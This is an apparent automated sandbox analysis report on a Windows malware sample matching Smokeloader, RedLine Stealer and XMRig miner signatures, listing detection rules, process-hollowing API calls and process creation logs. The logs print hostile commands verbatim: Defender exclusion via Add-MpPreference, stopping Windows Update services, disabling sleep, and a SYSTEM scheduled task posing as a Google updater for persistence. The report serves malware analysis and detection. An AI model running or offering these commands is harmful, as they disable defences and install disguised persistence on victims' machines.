                          Source: 0000003B.00000002.2612331641.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                          Source: 00000005.00000002.4575660571.0000000002B6B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                          Source: C:\Windows\Temp\whxcdqscjswq.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: C:\Windows\Temp\whxcdqscjswq.tmp, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: C:\Windows\Temp\whxcdqscjswq.tmp, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_55jy3kl2.nkj.ps1
                          Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exeCode function: 2_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_00403532
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell
                          Source: C:\Windows\System32\conhost.exeCode function: String function: 00007FF6EB433F50 appears 34 times
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_00830110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,3_2_00830110
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 9_2_0040180C Sleep,NtTerminateProcess,9_2_0040180C
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 9_2_00401818 Sleep,NtTerminateProcess,9_2_00401818
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 9_2_00401822 Sleep,NtTerminateProcess,9_2_00401822
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 9_2_00401826 Sleep,NtTerminateProcess,9_2_00401826
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 9_2_00401834 Sleep,NtTerminateProcess,9_2_00401834
                          Source: C:\Users\user\AppData\Roaming\cdttvvcCode function: 57_2_00A50110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,57_2_00A50110
                          Source: C:\Users\user\AppData\Roaming\cdttvvcCode function: 59_2_0040180C Sleep,NtTerminateProcess,59_2_0040180C
                          Source: C:\Users\user\AppData\Roaming\cdttvvcCode function: 59_2_00401818 Sleep,NtTerminateProcess,59_2_00401818
                          Source: C:\Users\user\AppData\Roaming\cdttvvcCode function: 59_2_00401822 Sleep,NtTerminateProcess,59_2_00401822
                          Source: C:\Users\user\AppData\Roaming\cdttvvcCode function: 59_2_00401826 Sleep,NtTerminateProcess,59_2_00401826
                          Source: C:\Users\user\AppData\Roaming\cdttvvcCode function: 59_2_00401834 Sleep,NtTerminateProcess,59_2_00401834
                          Source: C:\Windows\System32\conhost.exeCode function: 60_2_00007FF6EB433F50 NtClose,60_2_00007FF6EB433F50
                          Source: file.exe, 00000000.00000000.2090227189.0000000001282000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelatestumma.exe4 vs file.exe
                          Source: file.exe, 00000000.00000002.2139110685.0000000001BDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                          Source: toolspub2.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: cdttvvc.19.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.logJump to behavior
                          Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.mine.winEXE@101/48@15/3
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Broom.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Broom.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\latestX.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to behavior
                          Source: file.exeReversingLabs: Detection: 73%
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe "C:\Users\user\AppData\Local\Temp\InstallSetup5.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"
                          Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exeProcess created: C:\Users\user\AppData\Local\Temp\Broom.exe C:\Users\user\AppData\Local\Temp\Broom.exe
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe "C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\latestX.exe "C:\Users\user\AppData\Local\Temp\latestX.exe"
                          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeProcess created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Windows\servicing\TrustedInstaller.exe C:\Windows\servicing\TrustedInstaller.exe
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeProcess created: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Program Files\Google\Chrome\updater.exe C:\Program Files\Google\Chrome\updater.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\cdttvvc C:\Users\user\AppData\Roaming\cdttvvc
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                          Source: C:\Users\user\AppData\Roaming\cdttvvcProcess created: C:\Users\user\AppData\Roaming\cdttvvc C:\Users\user\AppData\Roaming\cdttvvc
                          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mgttsuddg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe "C:\Users\user\AppData\Local\Temp\InstallSetup5.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe "C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\latestX.exe "C:\Users\user\AppData\Local\Temp\latestX.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exeProcess created: C:\Users\user\AppData\Local\Temp\Broom.exe C:\Users\user\AppData\Local\Temp\Broom.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeProcess created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofileJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\latestX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\latestX.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvcJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\latestX.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\latestX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\latestX.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"Jump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                          Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                          Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                          Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                          Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                          Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
                          Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                          Source: C:\Users\user\AppData\Roaming\cdttvvcProcess created: C:\Users\user\AppData\Roaming\cdttvvc C:\Users\user\AppData\Roaming\cdttvvc
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mgttsuddg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                          Source: C:\Windows\System32\conhost.exeProcess created: unknown unknown
                          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exeCode function: 2_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_00403532
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
